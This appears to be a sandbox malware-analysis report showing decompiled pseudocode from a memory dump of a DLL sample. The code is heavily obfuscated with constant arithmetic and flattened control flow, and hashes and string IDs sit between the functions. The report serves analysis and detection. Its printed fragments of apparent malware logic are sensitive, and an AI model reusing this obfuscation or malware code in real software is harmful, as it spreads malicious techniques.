                          				_v1652 = _v1652 / _t498;
                          				_v1652 = _v1652 ^ 0x000062be;
                          				_v1644 = 0xb03f6e;
                          				_v1644 = _v1644 | 0x923ba096;
                          				_v1644 = _v1644 ^ 0x92bf0244;
                          				_v1596 = 0xe574f1;
                          				_t499 = 0x34;
                          				_v1596 = _v1596 * 0x7b;
                          				_v1596 = _v1596 ^ 0x6e3d68f9;
                          				_v1712 = 0x56ecc;
                          				_v1712 = _v1712 | 0x82f65ce8;
                          				_v1712 = _v1712 ^ 0x3fbbcfe7;
                          				_v1712 = _v1712 ^ 0xbd43ec0e;
                          				_v1672 = 0x17149a;
                          				_v1672 = _v1672 >> 3;
                          				_v1672 = _v1672 ^ 0x000903bb;
                          				_v1780 = 0xd02801;
                          				_v1780 = _v1780 + 0x92b0;
                          				_v1780 = _v1780 >> 2;
                          				_v1780 = _v1780 >> 2;
                          				_v1780 = _v1780 ^ 0x000a2638;
                          				_v1680 = 0x58b587;
                          				_v1680 = _v1680 / _t499;
                          				_t500 = 0x6c;
                          				_v1680 = _v1680 / _t500;
                          				_v1680 = _v1680 ^ 0x000e92c3;
                          				_v1756 = 0xa3a224;
                          				_v1756 = _v1756 + 0xffffb0d0;
                          				_v1756 = _v1756 | 0x22aa770c;
                          				_v1756 = _v1756 ^ 0xa1e09b61;
                          				_v1756 = _v1756 ^ 0x83433f26;
                          				_v1772 = 0x502a69;
                          				_v1772 = _v1772 + 0xf56b;
                          				_v1772 = _v1772 ^ 0x45c826e2;
                          				_v1772 = _v1772 << 3;
                          				_v1772 = _v1772 ^ 0x2cc29674;
                          				_v1704 = 0x78c4c8;
                          				_v1704 = _v1704 >> 5;
                          				_v1704 = _v1704 >> 0xb;
                          				_v1704 = _v1704 ^ 0x000284d1;
                          				_v1636 = 0x5a1a48;
                          				_v1636 = _v1636 | 0x49fffb3e;
                          				_v1636 = _v1636 ^ 0x49fe8be8;
                          				_v1740 = 0xbf037f;
                          				_v1740 = _v1740 << 0xe;
                          				_t501 = 0x25;
                          				_v1740 = _v1740 / _t501;
                          				_v1740 = _v1740 | 0xccccb3e4;
                          				_v1740 = _v1740 ^ 0xcdfabced;
                          				_v1688 = 0x95b1ca;
                          				_v1688 = _v1688 ^ 0x177e4a6b;
                          				_v1688 = _v1688 | 0x2f1db7c3;
                          				_v1688 = _v1688 ^ 0x3ffaee54;
                          				_v1592 = 0x55c9d;
                          				_v1592 = _v1592 + 0x6a7d;
                          				_v1592 = _v1592 ^ 0x0009fe3c;
                          				_v1628 = 0x3a227c;
                          				_v1628 = _v1628 + 0x86b1;
                          				_v1628 = _v1628 ^ 0x003b89cb;
                          				_v1588 = 0x8f964;
                          				_v1588 = _v1588 ^ 0xa28705c5;
                          				_v1588 = _v1588 ^ 0xa2875abd;
                          				_v1748 = 0xfacc7e;
                          				_v1748 = _v1748 >> 7;
                          				_v1748 = _v1748 << 5;
                          				_v1748 = _v1748 * 0x52;
                          				_v1748 = _v1748 ^ 0x141cbb89;
                          				_v1668 = 0x1ea707;
                          				_v1668 = _v1668 >> 9;
                          				_v1668 = _v1668 ^ 0x0009aede;
                          				_v1620 = 0x6a93f9;
                          				_v1620 = _v1620 * 0x2f;
                          				_v1620 = _v1620 ^ 0x139d0c16;
                          				_v1732 = 0xe0254d;
                          				_v1732 = _v1732 >> 5;
                          				_v1732 = _v1732 + 0x8d90;
                          				_v1732 = _v1732 ^ 0x6e303e8a;
                          				_v1732 = _v1732 ^ 0x6e36b510;
                          				_v1764 = 0x8f9e28;
                          				_v1764 = _v1764 | 0x05ab8c08;
                          				_v1764 = _v1764 ^ 0x1f734d6b;
                          				_v1764 = _v1764 | 0x4c44fbff;
                          				_v1764 = _v1764 ^ 0x5ed9dcbf;
                          				_v1664 = 0x89ae50;
                          				_v1664 = _v1664 + 0xffff7042;
                          				_v1664 = _v1664 ^ 0x008bcf93;
                          				_v1720 = 0x59414f;
                          				_v1720 = _v1720 ^ 0xb8de2fa2;
                          				_v1720 = _v1720 << 3;
                          				_v1720 = _v1720 ^ 0xc43925a0;
                          				_v1776 = 0x701ae5;
                          				_v1776 = _v1776 * 0x2f;
                          				_v1776 = _v1776 + 0xffff7ac3;
                          				_v1776 = _v1776 >> 0xd;
                          				_v1776 = _v1776 ^ 0x000eab5b;
                          				_v1784 = 0xc6ba99;
                          				_v1784 = _v1784 + 0xffff3dc8;
                          				_v1784 = _v1784 + 0xfffff02f;
                          				_v1784 = _v1784 << 0xa;
                          				_v1784 = _v1784 ^ 0x17a755e4;
                          				_v1648 = 0x49cca0;
                          				_v1648 = _v1648 << 0xe;
                          				_v1648 = _v1648 ^ 0x7324fd9e;
                          				_v1656 = 0xf258c2;
                          				_v1656 = _v1656 >> 9;
                          				_v1656 = _v1656 ^ 0x0001b893;
                          				_v1792 = 0x2c7b35;
                          				_t265 =  &_v1792; // 0x2c7b35
                          				_t502 = 0x5b;
                          				_v1792 =  *_t265 * 0xd;
                          				_v1792 = _v1792 << 2;
                          				_v1792 = _v1792 + 0x1495;
                          				_v1792 = _v1792 ^ 0x090f1a77;
                          				_v1768 = 0xbf4508;
                          				_v1768 = _v1768 / _t502;
                          				_v1768 = _v1768 * 0x7b;
                          				_v1768 = _v1768 * 0x6c;
                          				_v1768 = _v1768 ^ 0x6d142a82;
                          				_v1640 = 0xd70bb;
                          				_v1640 = _v1640 + 0xffffb965;
                          				_v1640 = _v1640 ^ 0x000d3816;
                          				_v1752 = 0x745b9d;
                          				_v1752 = _v1752 >> 0xb;
                          				_v1752 = _v1752 + 0xde80;
                          				_v1752 = _v1752 + 0xffff3192;
                          				_v1752 = _v1752 ^ 0x0008925b;
                          				_v1760 = 0xacf8cd;
                          				_v1760 = _v1760 + 0xffff9672;
                          				_v1760 = _v1760 | 0xf153a794;
                          				_v1760 = _v1760 >> 8;
                          				_v1760 = _v1760 ^ 0x00f89a8f;
                          				_v1736 = 0x809c29;
                          				_v1736 = _v1736 + 0xffffec2c;
                          				_v1736 = _v1736 | 0xf5f6afdc;
                          				_v1736 = _v1736 ^ 0xe29e6862;
                          				_v1736 = _v1736 ^ 0x176fe90e;
                          				_v1692 = 0x187f09;
                          				_v1692 = _v1692 ^ 0xea03092e;
                          				_v1692 = _v1692 + 0x8629;
                          				_v1692 = _v1692 ^ 0xea1b0891;
                          				_v1616 = 0xdadf05;
                          				_v1616 = _v1616 >> 3;
                          				_v1616 = _v1616 ^ 0x001b90e7;
                          				_v1700 = 0x255f4a;
                          				_v1700 = _v1700 + 0x19d8;
                          				_v1700 = _v1700 * 0x77;
                          				_v1700 = _v1700 ^ 0x1164c06a;
                          				_v1728 = 0x19a192;
                          				_v1728 = _v1728 | 0x5ed50fa2;
                          				_v1728 = _v1728 + 0xffff411c;
                          				_v1728 = _v1728 | 0x02c614be;
                          				_v1728 = _v1728 ^ 0x5edf5bbc;
                          				_v1608 = 0x401b2;
                          				_v1608 = _v1608 | 0xbe85eb48;
                          				_v1608 = _v1608 ^ 0xbe8cf33f;
                          				_v1676 = 0x1ae3ab;
                          				_v1676 = _v1676 | 0xf7e0dbb3;
                          				_v1676 = _v1676 >> 4;
                          				_v1676 = _v1676 ^ 0x0f7cac70;
                          				_v1724 = 0xfdfaa3;
                          				_v1724 = _v1724 + 0xbcd0;
                          				_v1724 = _v1724 | 0x4b62528b;
                          				_v1724 = _v1724 ^ 0x4bf9131d;
                          				_v1708 = 0x8383c7;
                          				_v1708 = _v1708 >> 2;
                          				_v1708 = _v1708 + 0xffff26cd;
                          				_v1708 = _v1708 ^ 0x002bd4f5;
                          				_v1624 = 0xf208a5;
                          				_v1624 = _v1624 << 8;
                          				_v1624 = _v1624 ^ 0xf20fbad4;
                          				_t548 = _v1584;
                          				while(1) {
                          					L1:
                          					_t503 = 0x5394512;
                          					L2:
                          					while(_t550 != 0x36274) {
                          						if(_t550 == 0x34d5b0c) {
                          							_push(_t503);
                          							_t477 = E00D485FF(_v1736, _v1692, __eflags,  &_v1580, 0,  &_v1564, _v1616, 0, _v1700);
                          							__eflags = _t477;
                          							if(_t477 == 0) {
                          								L26:
                          								return _t477;
                          							}
                          							E00D51538(_v1728, _v1608, _v1580);
                          							_t537 = _v1724;
                          							_push(_v1576);
                          							_t507 = _v1676;
                          							L25:
                          							return E00D51538(_t507, _t537);
                          						}
                          						if(_t550 == 0x37ad1c9) {
                          							_t537 = _v1624;
                          							_push(_v1584);
                          							_t507 = _v1708;
                          							goto L25;
                          						}
                          						if(_t550 == _t503) {
                          							_push(_v1792);
                          							_t481 = E00D4017B( &_v1564, _v1776, _t503, _v1784, _v1648, _v1584,  &_v1580, _v1656);
                          							_t555 = _t555 + 0x20;
                          							__eflags = _t481;
                          							if(__eflags != 0) {
                          								E00D51538(_v1768, _v1640, _v1580);
                          								E00D51538(_v1752, _v1760, _v1576);
                          							}
                          							L14:
                          							_t550 = 0x37ad1c9;
                          							while(1) {
                          								L1:
                          								_t503 = 0x5394512;
                          								goto L2;
                          							}
                          						}
                          						if(_t550 == 0x854d193) {
                          							_t550 = 0x36274;
                          							continue;
                          						}
                          						if(_t550 == 0x9c7608b) {
                          							E00D50DB1(_v1696,  &_v1044, __eflags, _v1684, _t503, _v1652);
                          							 *((short*)(E00D409DD(_v1644,  &_v1044, _v1596, _v1712))) = 0;
                          							E00D3BAA9(_v1672, _v1780, __eflags, _v1680, _v1756,  &_v524);
                          							_push(_v1740);
                          							_push(_v1636);
                          							_push(_v1704);
                          							E00D52D0A(_v1592, __eflags,  &_v524, _v1628, _v1588, _v1748, 0xd318bc,  &_v1564,  &_v1044, E00D4E1F8(0xd318bc, _v1772, __eflags));
                          							E00D4FECB(_t488, _v1668, _v1620, _v1732, _v1764);
                          							_t555 = _t555 + 0x58;
                          							__eflags = E00D3BFBE( &_v1564, _t496, _v1720);
                          							if(__eflags != 0) {
                          								_t474 = 0x2f41e48;
                          								__eflags = _t548 - 0x2f41e48;
                          								_t503 = 0x5394512;
                          								_t550 =  ==  ? 0x5394512 : 0x34d5b0c;
                          								continue;
                          							}
                          							goto L14;
                          						}
                          						if(_t550 != 0xf62a168) {
                          							L20:
                          							__eflags = _t550 - 0x4f1a594;
                          							if(__eflags != 0) {
                          								continue;
                          							}
                          							return _t474;
                          						}
                          						if(_t548 != _t474) {
                          							_t550 = 0x9c7608b;
                          							continue;
                          						}
                          						_push(_v1788);
                          						_push( &_v1584);
                          						_t477 = E00D49774(_v1612, _v1660, _v1600, _t503, _v1604, _t503);
                          						_t555 = _t555 + 0x18;
                          						if(_t477 == 0) {
                          							goto L26;
                          						}
                          						_t550 = 0x9c7608b;
                          						goto L1;
                          					}
                          					_t472 = E00D4C387(_t503);
                          					__eflags = _t472 - E00D4BC6B();
                          					_t474 = 0x2f41e48;
                          					_t550 = 0xf62a168;
                          					_t548 =  !=  ? 0x2f41e48 : 0x95df4e1;
                          					_t503 = 0x5394512;
                          					goto L20;
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $P$5{,$8&$J_%$M%$OAY$i*P$|":$}j
                          • API String ID: 0-2024644708
                          • Opcode ID: d956548147c8a6e3dfb70952a21168a7c6d8682d0648da809026ba17f65cd520
                          • Instruction ID: 51a42735d5984833389c1c60c056d2f0814ff1c105be8bc78bac7cb194925e36
                          • Opcode Fuzzy Hash: d956548147c8a6e3dfb70952a21168a7c6d8682d0648da809026ba17f65cd520
                          • Instruction Fuzzy Hash: D5320F714093819FD778CF61C58AB9BBBE1BBC4308F50891DE6DA96220D7B18949CF63
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E00D4B257(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                          				char _v4;
                          				char _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				unsigned int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				intOrPtr _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				intOrPtr _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				intOrPtr _t442;
                          				void* _t450;
                          				signed int _t452;
                          				intOrPtr _t464;
                          				signed int _t466;
                          				signed int _t467;
                          				signed int _t468;
                          				signed int _t469;
                          				signed int _t470;
                          				signed int _t471;
                          				signed int _t472;
                          				signed int _t473;
                          				signed int _t474;
                          				signed int _t475;
                          				intOrPtr _t476;
                          				void* _t511;
                          				intOrPtr* _t519;
                          				signed int _t522;
                          				signed int* _t528;
                          				void* _t531;
                          
                          				_push(_a8);
                          				_push(_a4);
                          				_v16 = __ecx;
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(__ecx);
                          				_v104 = 0xdca0c2;
                          				_t528 =  &(( &_v196)[4]);
                          				_v104 = _v104 ^ 0x20eddded;
                          				_v104 = _v104 + 0xc1e4;
                          				_t464 = 0;
                          				_v104 = _v104 ^ 0x20323f12;
                          				_t526 = 0;
                          				_v100 = 0xb7a414;
                          				_t522 = 0x63dbfd2;
                          				_v100 = _v100 >> 0xd;
                          				_v100 = _v100 >> 6;
                          				_v100 = _v100 ^ 0x00000017;
                          				_v56 = 0x45a952;
                          				_t466 = 0x59;
                          				_v56 = _v56 * 0x5b;
                          				_v56 = _v56 ^ 0x18c33027;
                          				_v188 = 0x2a9354;
                          				_v188 = _v188 * 0x52;
                          				_v188 = _v188 + 0xffff09d3;
                          				_v188 = _v188 ^ 0x657f446d;
                          				_v188 = _v188 ^ 0x68d207a2;
                          				_v156 = 0xab48ef;
                          				_v156 = _v156 >> 9;
                          				_v156 = _v156 ^ 0x16e9b314;
                          				_v156 = _v156 + 0xffff4dee;
                          				_v156 = _v156 ^ 0x16e86217;
                          				_v76 = 0xa04b9d;
                          				_v76 = _v76 / _t466;
                          				_v76 = _v76 + 0xffff95c9;
                          				_v76 = _v76 ^ 0x000bb2f5;
                          				_v96 = 0x5e9ce7;
                          				_v96 = _v96 >> 0xb;
                          				_v96 = _v96 + 0x393b;
                          				_v96 = _v96 ^ 0x0008104f;
                          				_v168 = 0x9b8ea1;
                          				_v168 = _v168 >> 3;
                          				_v168 = _v168 ^ 0x41b76bd4;
                          				_t467 = 0x4a;
                          				_v168 = _v168 / _t467;
                          				_v168 = _v168 ^ 0x00e0763a;
                          				_v84 = 0x6b9fd8;
                          				_v84 = _v84 + 0xffff492d;
                          				_v84 = _v84 ^ 0xc4f61535;
                          				_v84 = _v84 ^ 0xc49355d0;
                          				_v92 = 0xe62d26;
                          				_v92 = _v92 + 0xffffd3ae;
                          				_v92 = _v92 + 0xba25;
                          				_v92 = _v92 ^ 0x00e8488b;
                          				_v176 = 0x224b80;
                          				_v176 = _v176 * 0x64;
                          				_v176 = _v176 + 0xbfa2;
                          				_v176 = _v176 ^ 0x4d1eb270;
                          				_v176 = _v176 ^ 0x4076c61f;
                          				_v24 = 0x19cf70;
                          				_v24 = _v24 ^ 0x9000781e;
                          				_v24 = _v24 ^ 0x90166967;
                          				_v88 = 0x46d2d8;
                          				_v88 = _v88 << 0xd;
                          				_v88 = _v88 + 0x562b;
                          				_v88 = _v88 ^ 0xda50dff0;
                          				_v112 = 0x785cae;
                          				_v112 = _v112 ^ 0x168a73c4;
                          				_v112 = _v112 | 0x1d89c9b4;
                          				_v112 = _v112 ^ 0x1ff91637;
                          				_v196 = 0xff4614;
                          				_t468 = 0x5f;
                          				_v196 = _v196 / _t468;
                          				_v196 = _v196 + 0x757b;
                          				_t469 = 0x16;
                          				_v196 = _v196 * 0x60;
                          				_v196 = _v196 ^ 0x012524f0;
                          				_v80 = 0xc3120d;
                          				_v80 = _v80 | 0x1e4982bc;
                          				_v80 = _v80 * 0x7e;
                          				_v80 = _v80 ^ 0x2837c3c2;
                          				_v120 = 0xd97d0d;
                          				_v120 = _v120 << 0xd;
                          				_v120 = _v120 + 0x504;
                          				_v120 = _v120 ^ 0x2fa67262;
                          				_v172 = 0x34730a;
                          				_t142 =  &_v172; // 0x34730a
                          				_v172 =  *_t142 * 0x22;
                          				_t144 =  &_v172; // 0x34730a
                          				_v172 =  *_t144 / _t469;
                          				_v172 = _v172 << 8;
                          				_v172 = _v172 ^ 0x5108b0e0;
                          				_v68 = 0x5410d;
                          				_v68 = _v68 | 0x0af8be45;
                          				_v68 = _v68 << 4;
                          				_v68 = _v68 ^ 0xafd73693;
                          				_v40 = 0x3314ee;
                          				_v40 = _v40 << 6;
                          				_v40 = _v40 ^ 0x0cc221f8;
                          				_v148 = 0xdcf092;
                          				_v148 = _v148 >> 2;
                          				_t470 = 0x7d;
                          				_v148 = _v148 * 7;
                          				_v148 = _v148 ^ 0xc025e338;
                          				_v148 = _v148 ^ 0xc1a4d56b;
                          				_v48 = 0x99791e;
                          				_v48 = _v48 + 0xd07a;
                          				_v48 = _v48 ^ 0x009468bf;
                          				_v20 = 0xfa3426;
                          				_v20 = _v20 * 0x2f;
                          				_v20 = _v20 ^ 0x2dec6acf;
                          				_v128 = 0x599df;
                          				_v128 = _v128 / _t470;
                          				_v128 = _v128 ^ 0x7679aa05;
                          				_v128 = _v128 ^ 0x7675df44;
                          				_v124 = 0xbc7529;
                          				_t471 = 0x70;
                          				_v124 = _v124 / _t471;
                          				_v124 = _v124 * 5;
                          				_v124 = _v124 ^ 0x00024b90;
                          				_v140 = 0x23c06e;
                          				_v140 = _v140 << 8;
                          				_v140 = _v140 + 0xffff4990;
                          				_v140 = _v140 ^ 0x23b90b70;
                          				_v32 = 0x48411;
                          				_v32 = _v32 >> 0xd;
                          				_v32 = _v32 ^ 0x000cf15b;
                          				_v28 = 0x8f257d;
                          				_v28 = _v28 >> 0xa;
                          				_v28 = _v28 ^ 0x00045aca;
                          				_v72 = 0xc5b926;
                          				_t472 = 0x25;
                          				_v72 = _v72 * 0xd;
                          				_v72 = _v72 + 0x5de2;
                          				_v72 = _v72 ^ 0x0a0d42ec;
                          				_v52 = 0xb82feb;
                          				_v52 = _v52 / _t472;
                          				_v52 = _v52 ^ 0x000a7562;
                          				_v192 = 0x93d477;
                          				_v192 = _v192 + 0x2145;
                          				_v192 = _v192 >> 9;
                          				_t473 = 0x79;
                          				_v192 = _v192 / _t473;
                          				_v192 = _v192 ^ 0x000494fa;
                          				_v60 = 0xdd5e00;
                          				_v60 = _v60 + 0xe8be;
                          				_v60 = _v60 ^ 0x00d904e2;
                          				_v116 = 0xf92f20;
                          				_v116 = _v116 << 2;
                          				_v116 = _v116 + 0xffff4fca;
                          				_v116 = _v116 ^ 0x03e480d1;
                          				_v108 = 0xc8e556;
                          				_v108 = _v108 << 0xe;
                          				_v108 = _v108 | 0x9333dae4;
                          				_v108 = _v108 ^ 0xbb75d6e6;
                          				_v184 = 0xf22b18;
                          				_v184 = _v184 + 0xffff5aea;
                          				_v184 = _v184 ^ 0x0621037b;
                          				_v184 = _v184 + 0xffff0635;
                          				_v184 = _v184 ^ 0x06c19238;
                          				_v36 = 0xa8ef7f;
                          				_v36 = _v36 + 0xffff4107;
                          				_v36 = _v36 ^ 0x00ab8625;
                          				_v44 = 0xa6062e;
                          				_v44 = _v44 << 0xd;
                          				_v44 = _v44 ^ 0xc0ced932;
                          				_v180 = 0x5e49fc;
                          				_v180 = _v180 + 0x375b;
                          				_v180 = _v180 << 2;
                          				_t474 = 0x74;
                          				_v180 = _v180 * 0x1c;
                          				_v180 = _v180 ^ 0x2957b537;
                          				_v164 = 0x531cb2;
                          				_v164 = _v164 << 0xf;
                          				_v164 = _v164 ^ 0x1fcb8a78;
                          				_v164 = _v164 / _t474;
                          				_v164 = _v164 ^ 0x014b6a45;
                          				_v64 = 0x492d9e;
                          				_v64 = _v64 ^ 0x2124760e;
                          				_v64 = _v64 ^ 0x216a5ba9;
                          				_v132 = 0x711783;
                          				_v132 = _v132 | 0x71acd4bd;
                          				_v132 = _v132 + 0x97cf;
                          				_v132 = _v132 ^ 0x71fa50e2;
                          				_v152 = 0xb0a3b1;
                          				_v152 = _v152 ^ 0xa6c9b18c;
                          				_t475 = 0x5e;
                          				_v152 = _v152 / _t475;
                          				_v152 = _v152 / _t475;
                          				_v152 = _v152 ^ 0x0003c09f;
                          				_v136 = 0xe5fa51;
                          				_v136 = _v136 + 0xde7e;
                          				_v136 = _v136 + 0xffffe7ef;
                          				_v136 = _v136 ^ 0x00ec445b;
                          				_t519 = _v12;
                          				while(1) {
                          					L1:
                          					_t442 = _v144;
                          					while(1) {
                          						L2:
                          						while(1) {
                          							L3:
                          							_t476 = _v160;
                          							while(1) {
                          								L4:
                          								_t531 = _t522 - 0x93283d2;
                          								if(_t531 > 0) {
                          									break;
                          								}
                          								if(_t531 == 0) {
                          									return E00D52B09(_v132, _t464, _v152, _v136);
                          								}
                          								if(_t522 == 0x6c245) {
                          									_push( &_v12);
                          									_push(_t464);
                          									_push(_t476);
                          									_push(_v68);
                          									_push(_v172);
                          									_push(_v120);
                          									_push(_v80);
                          									_push(_t476);
                          									_push(_v196);
                          									_push(_t476);
                          									_push(_v112);
                          									_push(_v88);
                          									_push(_v16);
                          									_t450 = E00D3FA95( &_v8, _v24);
                          									_t528 = _t528 - 0xc + 0x40;
                          									if(_t450 == 0) {
                          										L25:
                          										_t522 = 0x635125b;
                          										while(1) {
                          											L1:
                          											_t442 = _v144;
                          											goto L2;
                          										}
                          									} else {
                          										_t452 = E00D3DC1B( &_v8);
                          										_t522 = 0x4f2b403;
                          										_t442 = _v12 * 0x2c + _t464;
                          										_v144 = _t442;
                          										_t519 =  >=  ? _t464 : (_t452 & 0x0000001f) * 0x2c + _t464;
                          										goto L2;
                          									}
                          									L34:
                          								} else {
                          									if(_t522 == 0x4f2b403) {
                          										_t476 = E00D3EE62(_v148, _v16, _v48, _v20, _v128, _v56,  *_t519);
                          										_t528 =  &(_t528[5]);
                          										_t442 = _v144;
                          										_v160 = _t476;
                          										_t511 = 0xe34a72e;
                          										_t522 =  !=  ? 0xe34a72e : 0xced26bb;
                          										continue;
                          									} else {
                          										if(_t522 == 0x635125b) {
                          											E00D52B09(_v180, _t526, _v164, _v64);
                          											_t522 = 0x93283d2;
                          											while(1) {
                          												L1:
                          												_t442 = _v144;
                          												goto L2;
                          											}
                          										} else {
                          											if(_t522 == 0x63dbfd2) {
                          												_t522 = 0x8a8e175;
                          												continue;
                          											} else {
                          												if(_t522 != 0x8a8e175) {
                          													L30:
                          													if(_t522 != 0xfb7e38f) {
                          														_t442 = _v144;
                          														goto L3;
                          													}
                          												} else {
                          													_push(_t476);
                          													_push(_t476);
                          													_t442 = E00D3C5D8(0x20000);
                          													_t464 = _t442;
                          													_t528 =  &(_t528[3]);
                          													if(_t464 != 0) {
                          														_t522 = 0x965da6a;
                          														while(1) {
                          															L1:
                          															_t442 = _v144;
                          															L2:
                          															L3:
                          															_t476 = _v160;
                          															goto L4;
                          														}
                          													}
                          												}
                          											}
                          										}
                          									}
                          								}
                          								L33:
                          								return _t442;
                          								goto L34;
                          							}
                          							if(_t522 == 0x965da6a) {
                          								_push(_t476);
                          								_push(_t476);
                          								_t442 = E00D3C5D8(0x2000);
                          								_t526 = _t442;
                          								_t528 =  &(_t528[3]);
                          								if(_t442 == 0) {
                          									_t522 = 0x93283d2;
                          									goto L29;
                          								} else {
                          									_t522 = 0x6c245;
                          									goto L1;
                          								}
                          							} else {
                          								if(_t522 == 0xbf0ab43) {
                          									E00D3C3A7(_v100, _a8, _v108, _v184, _t526, _v36, _v44);
                          									_t528 =  &(_t528[5]);
                          									goto L25;
                          								} else {
                          									if(_t522 == 0xced26bb) {
                          										_t519 = _t519 + 0x2c;
                          										asm("sbb esi, esi");
                          										_t522 = (_t522 & 0xfebda1a8) + 0x635125b;
                          										goto L4;
                          									} else {
                          										if(_t522 == _t511) {
                          											E00D4FD4E(_v124, _v140, _v32, _v28,  &_v4, _v72, _t476, _v104, _t526);
                          											_t522 =  !=  ? 0xbf0ab43 : 0xced26bb;
                          											_t442 = E00D33046(_v52, _v192, _v60, _v160, _v116);
                          											_t528 =  &(_t528[0xb]);
                          											L29:
                          											_t511 = 0xe34a72e;
                          										}
                          										goto L30;
                          									}
                          								}
                          							}
                          							goto L33;
                          						}
                          					}
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: s4$&-$+V$E!$[7$[D$bu${u$B
                          • API String ID: 0-2389712741
                          • Opcode ID: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
                          • Instruction ID: 6df74be4bac2f7c00cc745ac4b12a58cc1c2999abd971fdb71b740083488dd90
                          • Opcode Fuzzy Hash: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
                          • Instruction Fuzzy Hash: BC2213B25083809FE368CF25C98AA5BBBE1FBD4318F10891DE5D996260D7B18949CF13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00D3C6B8() {
                          				char _v520;
                          				char _v1040;
                          				char _v1560;
                          				char _v1564;
                          				signed int _v1568;
                          				signed int _v1572;
                          				signed int _v1576;
                          				signed int _v1580;
                          				signed int _v1584;
                          				signed int _v1588;
                          				signed int _v1592;
                          				signed int _v1596;
                          				signed int _v1600;
                          				signed int _v1604;
                          				signed int _v1608;
                          				signed int _v1612;
                          				signed int _v1616;
                          				signed int _v1620;
                          				signed int _v1624;
                          				signed int _v1628;
                          				signed int _v1632;
                          				signed int _v1636;
                          				signed int _v1640;
                          				signed int _v1644;
                          				signed int _v1648;
                          				signed int _v1652;
                          				signed int _v1656;
                          				signed int _v1660;
                          				signed int _v1664;
                          				signed int _v1668;
                          				signed int _v1672;
                          				signed int _v1676;
                          				signed int _v1680;
                          				signed int _v1684;
                          				signed int _v1688;
                          				signed int _v1692;
                          				signed int _v1696;
                          				signed int _v1700;
                          				signed int _v1704;
                          				signed int _v1708;
                          				signed int _v1712;
                          				signed int _v1716;
                          				signed int _v1720;
                          				signed int _v1724;
                          				signed int _v1728;
                          				signed int _v1732;
                          				signed int _v1736;
                          				signed int _v1740;
                          				signed int _v1744;
                          				signed int _v1748;
                          				signed int _v1752;
                          				signed int _v1756;
                          				signed int _v1760;
                          				signed int _v1764;
                          				void* _t478;
                          				void* _t479;
                          				intOrPtr _t482;
                          				intOrPtr _t486;
                          				signed int _t494;
                          				intOrPtr* _t497;
                          				signed int _t501;
                          				intOrPtr _t502;
                          				intOrPtr* _t503;
                          				signed int _t504;
                          				signed int _t505;
                          				signed int _t506;
                          				signed int _t507;
                          				signed int _t508;
                          				signed int _t509;
                          				signed int _t510;
                          				signed int _t511;
                          				signed int _t512;
                          				void* _t513;
                          				void* _t522;
                          				void* _t562;
                          				signed int _t564;
                          				signed int* _t568;
                          
                          				_t568 =  &_v1764;
                          				_v1588 = 0x57daab;
                          				_v1588 = _v1588 + 0x535a;
                          				_v1588 = _v1588 ^ 0x00582e2c;
                          				_v1756 = 0x11011b;
                          				_v1756 = _v1756 | 0x986fcb94;
                          				_v1756 = _v1756 + 0xffff0812;
                          				_v1756 = _v1756 | 0x2bc6aa33;
                          				_v1756 = _v1756 ^ 0x3bfefbb2;
                          				_v1652 = 0x5adeab;
                          				_v1652 = _v1652 + 0xffff93f0;
                          				_v1652 = _v1652 ^ 0xbf2e951e;
                          				_v1652 = _v1652 ^ 0xbf74e787;
                          				_v1668 = 0x1eca4f;
                          				_v1668 = _v1668 + 0x52c;
                          				_v1568 = 0;
                          				_v1668 = _v1668 * 0xb;
                          				_t562 = 0xbc1c7ad;
                          				_v1668 = _v1668 ^ 0x0152ea48;
                          				_v1584 = 0x89d737;
                          				_v1584 = _v1584 + 0xffff9374;
                          				_v1584 = _v1584 ^ 0x0082a8e0;
                          				_v1672 = 0x7da8ac;
                          				_v1672 = _v1672 >> 0xf;
                          				_v1672 = _v1672 | 0x438c492a;
                          				_v1672 = _v1672 ^ 0x438e7d89;
                          				_v1636 = 0xa2c3bd;
                          				_v1636 = _v1636 << 3;
                          				_v1636 = _v1636 ^ 0x051ae408;
                          				_v1720 = 0x328717;
                          				_v1720 = _v1720 << 0xc;
                          				_v1720 = _v1720 << 0xd;
                          				_v1720 = _v1720 + 0x9e9a;
                          				_v1720 = _v1720 ^ 0x2e0b4663;
                          				_v1760 = 0x4b7b55;
